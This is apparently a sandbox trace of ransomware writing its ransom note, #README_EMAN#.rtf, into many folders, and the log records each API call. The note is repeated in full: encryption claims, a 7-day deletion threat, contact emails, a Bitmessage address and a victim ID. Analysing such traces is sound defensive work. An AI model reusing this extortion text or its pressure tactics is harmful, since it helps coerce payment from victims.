e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.609] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.609] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.611] CloseHandle (hObject=0x294) returned 1 [0297.611] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0297.611] GetLastError () returned 0x2 [0297.611] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.617] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 